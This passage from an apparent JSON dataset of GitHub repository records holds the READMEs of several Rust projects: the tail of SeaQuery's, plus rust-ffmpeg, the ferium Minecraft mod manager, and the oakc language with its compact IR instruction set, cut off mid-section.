.to_owned();\n\nassert_eq!(\n index.to_string(MysqlQueryBuilder),\n r#\"CREATE INDEX `idx-glyph-aspect` ON `glyph` (`aspect`)\"#\n);\nassert_eq!(\n index.to_string(PostgresQueryBuilder),\n r#\"CREATE INDEX \"idx-glyph-aspect\" ON \"glyph\" (\"aspect\")\"#\n);\nassert_eq!(\n index.to_string(SqliteQueryBuilder),\n r#\"CREATE INDEX \"idx-glyph-aspect\" ON \"glyph\" (\"aspect\")\"#\n);\n```\n\n### Index Drop\n\n```rust\nlet index = Index::drop()\n .name(\"idx-glyph-aspect\")\n .table(Glyph::Table)\n .to_owned();\n\nassert_eq!(\n index.to_string(MysqlQueryBuilder),\n r#\"DROP INDEX `idx-glyph-aspect` ON `glyph`\"#\n);\nassert_eq!(\n index.to_string(PostgresQueryBuilder),\n r#\"DROP INDEX \"idx-glyph-aspect\"\"#\n);\nassert_eq!(\n index.to_string(SqliteQueryBuilder),\n r#\"DROP INDEX \"idx-glyph-aspect\"\"#\n);\n```\n\n## License\n\nLicensed under either of\n\n- Apache License, Version 2.0\n ([LICENSE-APACHE](LICENSE-APACHE) or )\n- MIT license\n ([LICENSE-MIT](LICENSE-MIT) or )\n\nat your option.\n\n## Contribution\n\nUnless you explicitly state otherwise, any contribution intentionally submitted\nfor inclusion in the work by you, as defined in the Apache-2.0 license, shall be\ndual licensed as above, without any additional terms or conditions.\n\nSeaQuery is a community driven project. 
We welcome you to participate, contribute and together build for Rust's future.\n\nA big shout out to our contributors:\n\n[![Contributors](https://opencollective.com/sea-query/contributors.svg?width=1000&button=false)](https://github.com/SeaQL/sea-query/graphs/contributors)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "zmwangx/rust-ffmpeg", "link": "https://github.com/zmwangx/rust-ffmpeg", "tags": [], "stars": 693, "description": "Safe FFmpeg wrapper.", "lang": "Rust", "repo_lang": "", "readme": "[![crates.io](https://img.shields.io/crates/v/ffmpeg-next.svg)](https://crates.io/crates/ffmpeg-next)\n[![docs.rs](https://docs.rs/ffmpeg-next/badge.svg)](https://docs.rs/ffmpeg-next/)\n[![build](https://github.com/zmwangx/rust-ffmpeg/workflows/build/badge.svg)](https://github.com/zmwangx/rust-ffmpeg/actions)\n\nThis is a fork of the abandoned [ffmpeg](https://crates.io/crates/ffmpeg) crate by [meh.](https://github.com/meh/rust-ffmpeg).\n\nCurrently supported FFmpeg versions: 3.4.x through 4.4.x.\n\nBuild instructions can be found on the [wiki](https://github.com/zmwangx/rust-ffmpeg/wiki/Notes-on-building).\n\nDocumentation:\n\n- [docs.rs](https://docs.rs/ffmpeg-next/);\n- [FFmpeg user manual](https://ffmpeg.org/ffmpeg-all.html);\n- [FFmpeg Doxygen](https://ffmpeg.org/doxygen/trunk/).\n\n*Note on upgrading to v4.3.4 or later: v4.3.4 introduced automatic FFmpeg version detection, obsoleting feature flags `ffmpeg4`, `ffmpeg41`, `ffmpeg42` and `ffmpeg43`. If you manually specify any of these features, now is the time to remove them; if you use `ffmpeg43` through the `default` feature, it's still on for backward-compatibility but it has turned into a no-op, and you don't need to do anything. Deprecation plan: `ffmpeg43` will be dropped from default features come 4.4, and all these features will be removed come 5.0.*\n\n*See [CHANGELOG.md](CHANGELOG.md) for other information on version upgrades.*\n\nA word on versioning: major and minor versions of this crate track major and minor versions of FFmpeg, e.g. 4.2.x of this crate has been updated to support the 4.2.x series of FFmpeg. Patch level is reserved for changes to this crate and does not track FFmpeg patch versions. Since we can only freely bump the patch level, versioning of this crate differs from semver: minor versions may behave like semver major versions and introduce backward-incompatible changes; patch versions may behave like semver minor versions and introduce new APIs. Please peg the version you use accordingly.\n\n**Please realize that this crate is in maintenance-only mode for the most part.** Which means I'll try my best to ensure the crate compiles against all release branches of FFmpeg 3.4 and later (only the latest patch release of each release branch is officially supported) and fix reported bugs, but if a new FFmpeg version brings new APIs that require significant effort to port to Rust, you might have to send me a PR (and just to be clear, I can't really guarantee I'll have the time to review). 
Any PR to improve existing API is unlikely to be merged, unfortunately.\n\n\ud83e\udd1d **If you have significant, demonstrable experience in Rust and multimedia-related programming, please let me know, I'll be more than happy to invite you as a collaborator.** \ud83e\udd1d\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "gorilla-devs/ferium", "link": "https://github.com/gorilla-devs/ferium", "tags": ["minecraft", "minecraft-mod", "modrinth", "rust", "github-releases", "curseforge", "mod-manager"], "stars": 692, "description": "Fast and multi-source CLI program for managing Minecraft mods and modpacks from Modrinth, CurseForge, and GitHub Releases", "lang": "Rust", "repo_lang": "", "readme": "# Ferium\n\n[![rust badge](https://img.shields.io/static/v1?label=Made%20with&message=Rust&style=for-the-badge&logo=rust&labelColor=e82833&color=b11522)](https://www.rust-lang.org/)\n[![licence badge](https://img.shields.io/github/license/theRookieCoder/ferium?style=for-the-badge)](https://github.com/theRookieCoder/ferium/blob/main/LICENSE.txt)\n[![copyleft badge](https://img.shields.io/static/v1?label=&message=Copyleft&style=for-the-badge&labelColor=silver&color=silver&logo=data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADIAAAAyCAQAAAC0NkA6AAAABGdBTUEAALGPC/xhBQAAACBjSFJNAAB6JgAAgIQAAPoAAACA6AAAdTAAAOpgAAA6mAAAF3CculE8AAAAAmJLR0QA/4ePzL8AAAAHdElNRQfjAxYBNgYPa+9oAAAEM0lEQVRYw6WYb0zVVRjHP9wQW7umA0xoKNSC+6bSNkzetKZbaVu19aLpfOGcbcw/S+uNbikuNwMsVyE3XVsro7VEXjS3ylmLxkRtC9crHGjCAv9AATK4CoZye8Hl/J7n/M7v8rvX57w55/lznt/583yf5/xyCEOlrKaSCp6ggCiQYJheLvMHv9HHA1MZ++kmmaZ1UUNZ9g6eo4X7aR3Mtvs0syJzB0U0MR3KgddOsiQTFxsZzdDBTLvFetd0OT5OHo1U+7j9tNJBN4MkgChFVLCS1Sz1aR7jHf5Lv4Yov1hfN8YRKgP1V9LIuGVxhmg6Fwv4XalPcJD8OTe3gA+YVHYXgt3kWato46nQp1jOWWs1eW7Fz5VaLbkZ3cdc6pX9UfeNkvd+a1aRtV3Fle+mLeGWEO/0mT/EWo7SxhBjjNDPKfbxtMPNVjHLKMVa+I0Q1lmG89nDTWdctPGqz80hIT+uAWRaGOqzeJEraQOw2YrzXNqNbJrlnqDFsCeJKZO3uDtnnN+wNq6cCSM74SGtd1wHlfrOkHAyyDPKrk5codIZ1n7DSlAoVF9iKjRq/cVCYZnPmJHsnWF1GcYRobiQf3yA3sr7VPM2cXp9br5Va2k0/EsAy4SixKh6a5LT6rQibGBAyaeV9SohWQabzeBvhUcTaoqPHHhdTKfSOaWk1wx/E8TN4CuhssW6pjnOCF/KiNrOxULWZPgNEbEJF4VKFT2mdbGLpNNJPzVqC9eKkTdbDK4ajy9ngVaPiHuU5AshWWe4VyIsMuwbWTi5Q7sYlYj+TdNbFBHpJZEV8vao8sOjMS8VRh64MkumrRhSh5UQ+T278s+jQdF/1PTGI4yaweNZuHiYF1RsyCiapdFcengyNajgZyP4RBhP8RpDAU42KcxqE30vNK7KYJQpploFY1NgnfmvApYiZxpskLAi6/PFVh454HBRyJ9K5yclvS5hJQggP7YA8vvZzJCi1+m3NKoUYnj8Eg31jSonDFuTTPEju9nIZuq55IP6FvUJ3iF0zjBqApLWOu6FTlp9FCgM90rX9/zpt1Z9z56QLkasatnLRfe8TT5pmHetQqI6RAoesB5A5aIy/s5jrxAl0VmrJHqFvrQuflCwCPM4Jy71s1L0tTA75IPzAyo5ea3D8eg5LORf2mWqnGaXz3Q+b3CcDm6nCtBfqeV5R+xsUyf1mC3eoBLp9qzAcocquN90qRxTW/Fhxk+Hw8o+HvQIOqPU2qkI7SLGeauAmhf8YrygVCepU0HmpkLqLaQ7nz43Ra3VJBknzqpA/SrivofpaduF64n9Kdt83OupJ/YA48ACiolRyRpHovuMd5kKs8PrA+JirjbsvlFBlE9DyP8qXnQ3+eNiblpOc+gfOCc0gGRGpeyzymq7dbLXSmch/q24qIQ1VBKjjMLUT7UheunmIq2qQgmg/wHquM6d9tIV7AAAACV0RVh0ZGF0ZTpjcmVhdGUAMjAxOS0wMy0yMlQwMTo1NDowNiswMDowMOIizoUAAAAldEVYdGRhdGU6bW9kaWZ5ADIwMTktMDMtMjJUMDE6NTQ6MDYrMDA6MDCTf3Y5AAAAAElFTkSuQmCC)](https://en.wikipedia.org/wiki/Copyleft)\n\n> Check out ferium's sister projects [ferinth](https://github.com/gorilla-devs/ferinth) and [furse](https://github.com/gorilla-devs/furse) \n> They are Rust wrappers for the official Modrinth and CurseForge APIs respectively\n\nFerium is a fast and feature rich CLI program for downloading and updating Minecraft mods from [Modrinth](https://modrinth.com/mods), [CurseForge](https://curseforge.com/minecraft/mc-mods), and [GitHub 
Releases](https://docs.github.com/en/repositories/releasing-projects-on-github/about-releases), and modpacks from [Modrinth](https://modrinth.com/modpacks) and [CurseForge](https://curseforge.com/minecraft/modpacks).\nSimply specify the mods or modpacks you use through the CLI, and in just one command you can download all the mods or the modpack you configured.\n\n## Features\n\n- Download mods from multiple sources, namely [Modrinth](https://modrinth.com/mods), [CurseForge](https://curseforge.com/minecraft/mc-mods), and [GitHub Releases](https://docs.github.com/en/repositories/releasing-projects-on-github/about-releases)\n- Download modpacks from multiple sources, namely [Modrinth](https://modrinth.com/modpacks) and [CurseForge](https://curseforge.com/minecraft/modpacks)\n-
\n Pleasing and beautiful UI\n\n - Listing mods\n ![Listing Mods](media/list.png)\n - Listing mods verbosely\n ![Listing Mods Verbosely](media/list%20verbose.png)\n - Upgrading mods/modpacks\n ![Upgrading Mods/Modpacks](media/upgrade.png)\n
\n\n-
\n It's super fast due to multithreading for network intensive tasks\n\n Your results may vary depending on your internet connection.\n\n It downloads my modpack [Kupfur](https://github.com/theRookieCoder/Kupfur) with 79 mods in 15 seconds:\n\n https://user-images.githubusercontent.com/60034030/212559027-2df10657-82a3-407c-875d-9981628bbfc2.mp4\n\n It downloads [MMTP](https://www.curseforge.com/minecraft/modpacks/mats-mega-tech-pack), the largest modpack with around 400 mods, in just under a minute:\n\n https://user-images.githubusercontent.com/60034030/201951498-62d1e6d9-8edb-4399-b02c-f2562ae566e3.mp4\n
\n\n- Upgrade all your mods in one command, `ferium upgrade`\n - Ferium checks that the version being downloaded is the latest one compatible with the chosen mod loader and Minecraft version\n - You can configure overrides for mods that are not specified as compatible but still work\n- Download and install your modpack in one command, `ferium modpack upgrade`\n- Create multiple profiles and configure different mod loaders, Minecraft versions, output directories, and mods for each\n\n## Installation\n\nFerium builds from GitHub Releases do not require any external dependencies at runtime. \nIf you compile from source, using GCC to build will result in binaries that require GCC to be available at runtime. \nOn Linux, the regular version requires some sort of desktop environment that offers an XDG Desktop Portal.\nThe `nogui` versions do not need this as they don't have a GUI file picker, making these variants suitable for servers.\n\n### Packages\n\n[Coming to more package managers soon\u2122](https://github.com/theRookieCoder/ferium/issues/42)\n\n#### [Arch User Repository](https://aur.archlinux.org) for _Arch Linux_\n\n[![AUR](https://repology.org/badge/version-for-repo/aur/ferium.svg)](https://aur.archlinux.org/packages?K=ferium)\n\n> **Warning** \n> From-source builds will install the Rust toolchain and GCC\n\n| Installation method | GUI file dialogue | No GUI |\n|-------------------------------------------------|-------------------------------------------------------------------------|-------------------------------------------------------------|\n| Install pre-built binaries from GitHub Releases | **[ferium-gui-bin](https://aur.archlinux.org/packages/ferium-gui-bin)** | [ferium-bin](https://aur.archlinux.org/packages/ferium-bin) |\n| Build from source at the latest tag | [ferium-gui](https://aur.archlinux.org/packages/ferium-gui) | [ferium](https://aur.archlinux.org/packages/ferium) |\n| Build from source using the latest commit | [ferium-gui-git](https://aur.archlinux.org/packages/ferium-gui-git) | [ferium-git](https://aur.archlinux.org/packages/ferium-git) |\n\n#### [Homebrew](https://brew.sh) for _macOS_ or _Linux_\n[![Homebrew](https://repology.org/badge/version-for-repo/homebrew/ferium.svg)](https://formulae.brew.sh/formula/ferium)\n```bash\nbrew install ferium\n```\n\n#### [Scoop](https://scoop.sh) for _Windows_\n[![Scoop](https://repology.org/badge/version-for-repo/scoop/ferium.svg)](https://scoop.sh/#/apps?q=ferium)\n```bash\nscoop bucket add games\nscoop install ferium\n```\n\n#### [Pacstall](https://pacstall.dev) for _Ubuntu_\n[![Pacstall](https://repology.org/badge/version-for-repo/pacstall/ferium.svg)](https://pacstall.dev/packages/ferium-bin)\n```bash\npacstall -I ferium-bin\n```\n\n#### [Nixpkgs](https://nixos.wiki/wiki/Nixpkgs) for _NixOS_ or _Linux_\n[![Nixpkgs unstable](https://repology.org/badge/version-for-repo/nix_unstable/ferium.svg)](https://search.nixos.org/packages?show=ferium&channel=unstable)\n> **Note** \n> See package page for installation instructions\n\n#### [crates.io](https://crates.io) for the _Rust toolchain_\n[![crates.io](https://repology.org/badge/version-for-repo/crates_io/rust:ferium.svg)](https://crates.io/crates/ferium)\n```bash\ncargo install ferium\n```\n> **Warning** \n> Remember to use an add-on like [cargo-update](https://crates.io/crates/cargo-update) to keep ferium updated to the latest version!\n\n#### [GitHub Releases](https://docs.github.com/en/repositories/releasing-projects-on-github/about-releases) for _any platform_\n[![GitHub 
Releases](https://img.shields.io/github/v/release/gorilla-devs/ferium?color=bright-green&label=github%20releases)](https://github.com/gorilla-devs/ferium/releases)\n> **Warning** \n> You will have to manually download and install every time there is a new update\n\n1. Download the asset suitable for your operating system from [the latest release](https://github.com/gorilla-devs/ferium/releases/latest)\n2. Unzip the file and move it to a folder in your path, e.g. `~/bin`\n3. Remember to check the releases page for any updates!\n\n## Overview / Help Page\n\n> **Note** \n> A lot of ferium's backend is in a separate project [libium](https://github.com/theRookieCoder/libium). \n> It deals with things such as the config, adding mod(pack)s, upgrading, file pickers, etc.\n\nFerium stores profile and modpack information in its config file. By default it is located at `~/.config/ferium/config.json`, but you can change this in 2 ways. You can set the `FERIUM_CONFIG_FILE` environment variable or set the `--config-file` global command flag, the flag always takes precedence.\n\nYou can also set a custom CurseForge API key or GitHub personal access token using the `CURSEFORGE_API_KEY` and `GITHUB_TOKEN` environment variables or the `--curseforge_api_key` and `--github-token` flags respectively. Again, the flags take precedence.\n\n### First Startup\n\nYou can either have your own set of mods in what is called a 'profile', or install a modpack.\n\n- Create a new profile by running `ferium profile create` and entering the details for your profile\n - Then, add your mods using `ferium add`\n - Finally, download your mods using `ferium upgrade`\n- Add a modpack by running `ferium modpack add `\n - After which, run `ferium modpack upgrade` to download and install the modpack\n\n### Adding Mods\n\n- Modrinth\n - `ferium add project_id`\n - Where `project_id` is the slug or project id of the mod\n - For example, [Sodium](https://modrinth.com/mod/sodium) has the slug `sodium` and a project id `AANobbMI`\n - You can find the slug in the website url (`modrinth.com/mod/`), and the project id at the bottom of the left sidebar under 'Technical information'\n - So to add [Sodium](https://modrinth.com/mod/sodium), you should run `ferium add sodium` or `ferium add AANobbMI`\n- CurseForge\n - `ferium add project_id`\n - Where `project_id` is the project id of the mod\n - For example, [Terralith](https://www.curseforge.com/minecraft/mc-mods/terralith) has a project id `513688`\n - You can find the project id at the top of the right sidebar under 'About Project'\n - So to add [Terralith](https://www.curseforge.com/minecraft/mc-mods/terralith), you should run `ferium add 513688`\n- GitHub\n - `ferium add owner/name`\n - Where `owner` is the username of the owner of the repository and `name` is the name of the repository (both case-insensitive)\n - For example [Sodium's repository](https://github.com/CaffeineMC/sodium-fabric) has the id `CaffeineMC/sodium-fabric`\n - You can find these at the top left part of the repository's page as a big 'owner / name'\n - So to add [Sodium](https://github.com/CaffeineMC/sodium-fabric), you should run `ferium add CaffeineMC/sodium-fabric` (again, case-insensitive)\n - Note: The GitHub repository has to release JAR files in their Releases for ferium to download, or else it will refuse to be added\n\n#### Add External Mods\n\nIf you want to use files that are not downloadable by ferium, place them in the `user` folder in the output directory. 
Files here will be copied to the output directory when upgrading.\n\n> **Warning** \n> Profiles with the Quilt mod loader selected will not copy their `user` mods; this is because Quilt loads mods from nested directories as well (for loader versions above `0.18.1-beta.3`)\n\n### Adding Modpacks\n\n- Modrinth Modpacks\n - `ferium modpack add project_id`\n - Where `project_id` is the slug or project id of the modpack\n - For example, [Better Minecraft](https://modrinth.com/modpack/better-minecraft) has the slug `better-minecraft` and a project id `shFhR8Vx`\n - You can find the slug in the website url (`modrinth.com/modpack/`), and the project id at the bottom of the left sidebar under 'Technical information'\n - So to add [Better Minecraft](https://modrinth.com/modpack/better-minecraft), you should run `ferium modpack add better-minecraft` or `ferium modpack add shFhR8Vx`\n- CurseForge Modpacks\n - `ferium modpack add project_id`\n - Where `project_id` is the project id of the modpack\n - For example, [RLCraft](https://www.curseforge.com/minecraft/modpacks/rlcraft) has a project id `285109`\n - You can find the project id at the top of the right sidebar under 'About Project'\n - So to add [RLCraft](https://www.curseforge.com/minecraft/modpacks/rlcraft), you should run `ferium modpack add 285109`\n\n### Upgrading Mods\n\n> **Note** \n> If your output directory is not empty when setting it, ferium will offer to create a backup.\n> Please do so if it contains any files you would like to keep\n\nNow, after adding all your mods, run `ferium upgrade` to download all of them to your output directory.\nThis defaults to `.minecraft/mods`, where `.minecraft` is the default Minecraft resources directory. You don't need to worry about this if you play with Mojang's launcher (unless you changed the resources directory).\nYou can choose to pick a custom output directory during profile creation or [change it later](#profiles).\n\nIf ferium fails to download a mod, it will print its name in red and give the reason. It will continue downloading the rest of the mods and will exit with an error.\n\n> **Warning** \n> When upgrading, any files not downloaded by ferium will be moved to the `.old` folder in the output directory\n\n### Upgrading Modpacks\n\n> **Note** \n> If your output directory's `mods` and `resourcepacks` are not empty when setting it, ferium will offer to create a backup.\n> Please do so if they contain any files you would like to keep\n\nNow, after adding your modpack, run `ferium modpack upgrade` to download the modpack to your output directory.\nThis defaults to `.minecraft`, which is the default Minecraft resources directory. You don't need to worry about this if you play with Mojang's launcher (unless you changed the resources directory).\nYou can choose to pick a custom output directory when adding modpacks or [change it later](#managing-modpacks).\n\nIf ferium fails to download a mod, it will print its name in red and give the reason. It will continue downloading the rest of the mods and will exit with an error.\n\n> **Warning** \n> If you choose to install modpack overrides, your existing configs may be overwritten\n\n### Managing Mods\n\nYou can see all the mods in your current profile by running `ferium list`.
If you want to see more information about them, you can run `ferium list -v` or `ferium list --verbose`.\n\nYou can remove any of your mods by running `ferium remove`, selecting the ones you would like to remove by using the space key, and pressing enter once you're done.\nYou can also provide the names of the mods to remove as arguments. Mod names with spaces have to be given in quotes (`ferium remove \"ok zoomer\"`) or the spaces should be escaped (`ferium remove ok\\ zoomer`).\n\n#### Check Overrides\n\nIf some mod is compatible with your profile but ferium does not download it, [create an issue](https://github.com/theRookieCoder/ferium/issues/new) if you think it's a bug. You can disable the game version or mod loader checks by using the `--dont-check-game-version` and/or `--dont-check-mod-loader` flags when adding the mod, or manually setting `check_game_version` or `check_mod_loader` to false for the specific mod in the config.\n\nFor example, [Just Enough Items](https://www.curseforge.com/minecraft/mc-mods/jei) does not specify the mod loader for older Minecraft versions such as `1.12.2`. In this case, you would add JEI by running `ferium add 238222 --dont-check-mod-loader` so that the mod loader check is disabled.\nYou can also manually disable the mod loader (and/or game version) check(s) in the config like so:\n```json\n{\n \"name\": \"Just Enough Items (JEI)\",\n \"identifier\": {\n \"CurseForgeProject\": 238222\n },\n \"check_mod_loader\": false\n}\n```\n\n### Managing Modpacks\n\n#### Add\nWhen adding a modpack, you will configure the following:\n\n- Output directory\n - This defaults to `.minecraft`, which is the default Minecraft resources directory. You don't need to worry about this if you play with Mojang's launcher (unless you changed the resources directory)\n- Whether to install modpack overrides\n\nYou can also provide these settings as flags.\nFerium will automatically switch to the newly added modpack.\n\n#### Configure\n\nYou can configure these same settings afterwards by running `ferium modpack configure`.\nAgain, you can provide these settings as flags.\n\n#### Manage\n\nYou can see all the modpacks you have configured by running `ferium modpack list`.\nSwitch between your modpacks using `ferium modpack switch`.\nDelete a modpack by running `ferium modpack delete` and selecting the modpack you want to delete.\n\n### Profiles\n\n#### Create\nYou can create a profile by running `ferium profile create` and configuring the following:\n\n- Output directory\n - This defaults to `.minecraft/mods` where `.minecraft` is the default Minecraft resources directory. You don't need to worry about this if you play with Mojang's launcher (unless you changed the resources directory)\n- Name of the profile\n- Minecraft version\n- Mod loader\n\nYou can also provide these settings as flags.\nIf you want to copy the mods from another profile, provide the `--import` flag. 
You can also directly provide a profile name to the flag if you don't want a profile picker to be shown.\nFerium will automatically switch to the newly created profile.\n\n#### Configure\n\nYou can configure those same settings afterwards by running `ferium profile configure`.\nAgain, you can provide these settings as flags.\n\n#### Manage\n\nYou can see all the profiles you have by running `ferium profile list`.\nSwitch between your profiles using `ferium profile switch`.\nDelete a profile by running `ferium profile delete` and selecting the profile you want to delete.\n\n## Feature Requests\n\nIf you would like to make a feature request, check the [issues](https://github.com/theRookieCoder/ferium/issues?q=is%3Aissue) to see if the feature has already been added or is planned. If not, [create a new issue](https://github.com/theRookieCoder/ferium/issues/new).\n\n## Building from Source or Working on ferium\n\nFirstly, you need the Rust toolchain, which includes `cargo`, `rustup`, etc. You can install these from [the Rust website](https://www.rust-lang.org/tools/install).\nYou can manually run cargo commands, but I recommend [`just`](https://github.com/casey/just#installation), a command runner that's basically a much better version of `make`.\n\nTo build the project and install it to your Cargo binary directory, clone the project and run `just install`. If you want to install it for testing purposes, run `just` (alias to `just install-dev`), which builds in debug mode.\n\nYou can run clippy lints using `just lint`, integration tests using `cargo test`, and delete all build and test artefacts using `just clean`.\n\nIf you would like to see instructions for building for specific targets (e.g. Linux ARM), head over to the [workflow file](.github/workflows/build.yml).\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "adam-mcdaniel/oakc", "link": "https://github.com/adam-mcdaniel/oakc", "tags": ["c", "golang", "compiler", "compiler-design"], "stars": 692, "description": "A portable programming language with a compact intermediate representation", "lang": "Rust", "repo_lang": "", "readme": "# Oak\n\nAn infinitely more portable alternative to the C programming language.\n\n![Example](assets/example.png)\n\n## Why Oak?\n\nFor those of you that remember [\"free\"](https://github.com/adam-mcdaniel/free), oak is essentially a more robust and high level version of that project. The goal of oak is to be as high level as possible in the frontend, but as small and low level as possible in the backend.\n\n#### About the Author\n\nI'm a freshly minted high school graduate and freshman in college looking for work. If you enjoy my projects, consider supporting me by buying me a coffee! \n\n\n\n## Intermediate Representation\n\nThe key to oak's insane portability is its incredibly compact backend implementation. _The code for Oak's backend can be expressed in under 100 lines of C._ Such a small implementation is only possible because of the tiny instruction set of the intermediate representation. Oak's IR is only composed of **_17 different instructions_**. That's on par with [brainfuck](https://esolangs.org/wiki/Brainfuck)!\n\nThe backend of oak functions very simply. Every instruction operates on a _memory tape_. This tape is essentially a static array of double-precision floats.\n\n```js\n let x: num = 5.25; ... 
let p: &num = &x; `beginning of heap`\n | | |\n v v v\n[0, 0, 0, 5.25, 0, 0, 0, 0, 0, 0, 0, 0, 3, 0, 0, 0, 0, 0, 0, ...]\n ^\n |\n `current location of the stack pointer`\n```\n\nWhen a variable is defined in a function, it's given a static position relative to the virtual machine's current base pointer. So, when a function is called, space for the function's variables is allocated on the stack, and the base pointer is incremented to use this new space. Then, the compiler just replaces the variable with its address added to the base pointer offset in the rest of the code!\n\nAdditionally, the memory tape functions as a **_stack_** and a **_heap_**. After space for all of the program's variables is assigned, the memory used for the stack begins. The stack _grows_ and _shrinks_ with data throughout the program: when two numbers are summed, for example, they are popped off of the stack and replaced with the result. Similarly, the heap grows and shrinks throughout the program. The heap, however, is used for _dynamically allocated_ data: information with a memory footprint **unknown at compile time**.\n\nNow that you understand how oak's backend fundamentally operates, here's the complete instruction set!\n\n| Instruction | Side Effect |\n|-|-|\n| `push(n: f64);` | Push a number onto the stack. |\n| `add();` | Pop two numbers off of the stack, and push their sum. |\n| `subtract();` | Pop two numbers off of the stack. Subtract the first from the second, and push the result. |\n| `multiply();` | Pop two numbers off of the stack, and push their product. |\n| `divide();` | Pop two numbers off of the stack. Divide the second by the first, and push the result. |\n| `sign();` | Pop a number off of the stack. If it is greater than or equal to zero, push `1`, otherwise push `-1`. |\n| `allocate();` | Pop a number off of the stack, and return a pointer to that number of free cells on the heap. |\n| `free();` | Pop a number off of the stack, and go to where this number points in memory. Pop another number off of the stack, and free that many cells at this location in memory. |\n| `store(size: i32);` | Pop a number off of the stack, and go to where this number points in memory. Then, pop `size` numbers off of the stack. Store these numbers in reverse order at this location in memory. |\n| `load(size: i32);` | Pop a number off of the stack, and go to where this number points in memory. Then, push `size` number of consecutive memory cells onto the stack. |\n| `call(fn: i32);` | Call a user defined function by its compiler-assigned ID. |\n| `call_foreign_fn(name: String);` | Call a foreign function by its name in source. |\n| `begin_while();` | Start a while loop. For each iteration, pop a number off of the stack. If the number is not zero, continue the loop. |\n| `end_while();` | Mark the end of a while loop. |\n| `load_base_ptr();` | Load the base pointer of the established stack frame, which is always less than or equal to the stack pointer. Variables are stored relative to the base pointer for each function. So, for a function that defines `x: num` and `y: num`, `x` might be stored at `base_ptr + 1`, and `y` might be stored at `base_ptr + 2`. This allows functions to store variables in memory dynamically and as needed, rather than using static memory locations. |\n| `establish_stack_frame(arg_size: i32, local_scope_size: i32);` | Pop `arg_size` number of cells off of the stack and store them away. Then, call `load_base_ptr` to resume the parent stack frame when this function ends. 
Push `local_scope_size` number of zeroes onto the stack to make room for the function's variables. Finally, push the stored argument cells back onto the stack as they were originally ordered. |\n| `end_stack_frame(return_size: i32, local_scope_size: i32);` | Pop `return_size` number of cells off of the stack and store them away. Then, pop `local_scope_size` number of cells off of the stack to discard the stack frame's memory. Pop a value off of the stack and store it in the base pointer to resume the parent stack frame. Finally, push the stored return value cells back onto the stack as they were originally ordered. |\n\nUsing only these instructions, oak is able to implement _**even higher level abstractions than C can offer**_!!! That might not sound like much, but it's very powerful for a language this small.\n\n## Syntax and Flags\n\nThe syntax of oak is heavily inspired by the Rust programming language.\n\nFunctions are declared with the `fn` keyword, and are syntactically identical to Rust functions, with the exception of the `return` semantics. Additionally, user defined types and constants are declared with the `type` and `const` keywords respectively.\n\nSimilar to Rust's outer attributes, Oak introduces many compile time flags. Some of these are demonstrated below along with other Oak features.\n\n![Syntax Example](assets/syntax.png)\n\n## Compilation Process\n\nSo how exactly does the oak compiler work?\n\n1. Flatten structures into their functions\n - Structures in oak work differently than in other languages. The objects themselves are only arrays of memory cells: they don't have _**any**_ members or attributes. Structures _exclusively_ retrieve their data by using **_methods_** to return the addresses of their _\"members\"_. These methods are then flattened into simple functions. So, _`putnumln(*bday.day)`_ becomes _`putnumln(*Date::day(&bday))`_. This is a pretty simple process.\n\n2. Calculate the size of every operation's type\n - Because of the structure of oak's intermediate representation, the type of every expression must be known for compilation to continue. The compiler combs over each expression and finds the size of its type. From here on, the representation of the code looks like this:\n\n```rust\n// `3` is the size of the structure on the stack\nfn Date::new(month: 1, day: 1, year: 1) -> 3 {\n month; day; year\n}\n// self is a pointer to an item of size `3`\nfn Date::day(self: &3) -> &1 { self + 1 }\n\nfn main() -> 0 {\n let bday: 3 = Date::new(5, 14, 2002);\n}\n```\n\n3. Statically compute the program's memory footprint\n - After totalling all the statically allocated data, such as the overall memory size of static variables and string literals, the program preemptively sets aside the proper amount of memory on the stack. This essentially means that the stack pointer is _immediately_ moved to make room for all the data at the start of the program.\n\n4. Convert Oak expressions and statements into equivalent IR instructions\n - Most expressions are pretty straightforward: function calls simply push their arguments onto the stack in reverse order and call a function by its ID, references to a variable just push their assigned location on the stack as a number, and so on. Method calls, _however_, are a bit tricky.\n\n There are **_many_** different circumstances where a method call is valid. Methods _**always take a pointer to the structure as an argument**_. However, _an object that calls a method is not required to be a pointer_. 
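In Rust terms, the same trick can be sketched as auto-referencing (a rough, illustrative analogy, not oak's actual compiler code; the `Date` shape here just mirrors the README's earlier example):\n\n```rust\n// Sketch: a method is just a plain function whose first argument is a\n// pointer/reference to the instance; calling it on a plain value works\n// because the compiler inserts the reference for you.\nstruct Date { month: f64, day: f64, year: f64 }\n\nimpl Date {\n    fn day(&self) -> &f64 { &self.day }\n}\n\nfn main() {\n    let bday = Date { month: 5.0, day: 14.0, year: 2002.0 };\n    // `bday.day()` is sugar for `Date::day(&bday)`.\n    assert_eq!(*bday.day(), *Date::day(&bday));\n}\n```\n\n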
For example, the following code is valid: _`let bday: Date = Date::new(); bday.print();`_. The variable `bday` is not a pointer, yet the method _`.print()`_ can still be used. Here's why.\n\n When the compiler sees a flattened method call, it needs to find a way to transform the \"instance expression\" into a pointer. For variables, this is easy: just add a reference! For instance expressions that are already pointers, it's even easier: don't do anything! For any other kind of expression, though, it's a bit more verbose. The compiler sneaks in a hidden variable to store the expression, and then compiles the method call again using the variable as the instance expression. Pretty cool, right?\n\n5. Assemble the IR instructions for a target\n - Because oak's IR is so small, it can support several targets. Even better, adding a target is incredibly easy. In oak's crate, there's a trait named `Target`. If you implement each of the IR's instructions for your language using the `Target` trait, then oak can automatically compile all the way down to your new programming or assembly language! _Yes, it's as easy as it sounds!_\n\n## Documentation Tool\n\nTo allow users to read documentation of libraries and files without access to the internet, Oak provides the `doc` subcommand. This allows authors to add documentation attributes to their code to help other users understand their code or API without having to sift through the source and read comments.\n\nHere is some example code.\n```rust\n#[std]\n#[header(\"This file tests Oak's doc subcommand.\")]\n\n#[doc(\"This constant is a constant.\")]\nconst CONSTANT = 3;\n// No doc attribute\nconst TEST = CONSTANT + 5;\n\n#[doc(\"This structure represents a given date in time.\nA Date object has three members:\n|Member|Value|\n|-|-|\n|`month: num` | The month component of the date |\n|`day: num` | The day component of the date |\n|`year: num` | The year component of the date |\")]\nstruct Date {\n let month: num, day: num, year: num;\n\n #[doc(\"The constructor used to create a 